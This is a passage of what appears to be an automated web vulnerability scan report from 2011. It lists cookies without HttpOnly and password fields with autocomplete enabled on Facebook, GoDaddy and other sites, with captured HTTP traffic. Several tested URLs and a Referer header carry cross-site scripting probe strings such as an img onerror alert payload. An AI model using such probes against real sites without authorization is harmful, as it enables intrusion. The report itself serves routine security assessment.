Severity:	Information
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.98. http://www.tuaw.com/hub/app-reviews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/hub/app-reviews

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hub/app-reviews HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12. Password field with autocomplete enabled previous next
There are 98 instances of this issue:

http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/AOLrealestate
http://www.facebook.com/BPAmerica
http://www.facebook.com/DailyFinance
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/LadyBonesie
http://www.facebook.com/Loizza
http://www.facebook.com/aim
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/aol
http://www.facebook.com/aolradio
http://www.facebook.com/burkerkink
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mmafighting
http://www.facebook.com/mobile/
http://www.facebook.com/pages/Barnesville/115038011847083
http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820
http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478
http://www.facebook.com/pages/Blaine-Senior-High/106189406087059
http://www.facebook.com/pages/Editor-in-Chief/137829579583400
http://www.facebook.com/pages/Gilco-Corporation/109823499042436
http://www.facebook.com/pages/HMFIC/149403761740008
http://www.facebook.com/pages/Manchester-Connecticut/112527912096312
http://www.facebook.com/pages/Merchandiser/123981654314779
http://www.facebook.com/pages/New-Haven-College/130105783687523
http://www.facebook.com/pages/Northern-Illinois-University/108155335871674
http://www.facebook.com/pages/San-Antonio-Texas/110297742331680
http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707
http://www.facebook.com/pages/Sporting-News/104068362964496
http://www.facebook.com/pages/ToP-SeCNeT/195242630519520
http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/sportingnews
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/techcrunch
http://www.facebook.com/terms.php
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.facebook.com/
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/r.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.godaddy.com/gdshop/hosting/landing.asp
http://www.marketwatch.com/News/Story/Story.aspx
http://www.marketwatch.com/News/Story/Story.aspx
http://www.marketwatch.com/News/Story/Story.aspx
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.2. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.3. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.4. http://www.facebook.com/10000082482078341583 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.5. http://www.facebook.com/10000082482078341583ab0e5e0e0bd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.6. http://www.facebook.com/1242845259 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.7. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.8. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.9. http://www.facebook.com/AOLrealestate previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/AOLrealestate

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.10. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.11. http://www.facebook.com/DailyFinance previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/DailyFinance

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.12. http://www.facebook.com/HockeyKen previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HockeyKen

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.13. http://www.facebook.com/KickIceForever previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/KickIceForever

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.14. http://www.facebook.com/LadyBonesie previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LadyBonesie

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.15. http://www.facebook.com/Loizza previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Loizza

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.16. http://www.facebook.com/aim previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aim

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.17. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.18. http://www.facebook.com/aol previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aol

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.19. http://www.facebook.com/aolradio previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aolradio

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.20. http://www.facebook.com/burkerkink previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/burkerkink

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.21. http://www.facebook.com/careers/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.22. http://www.facebook.com/deedee.perez1 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/deedee.perez1

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.23. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.24. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

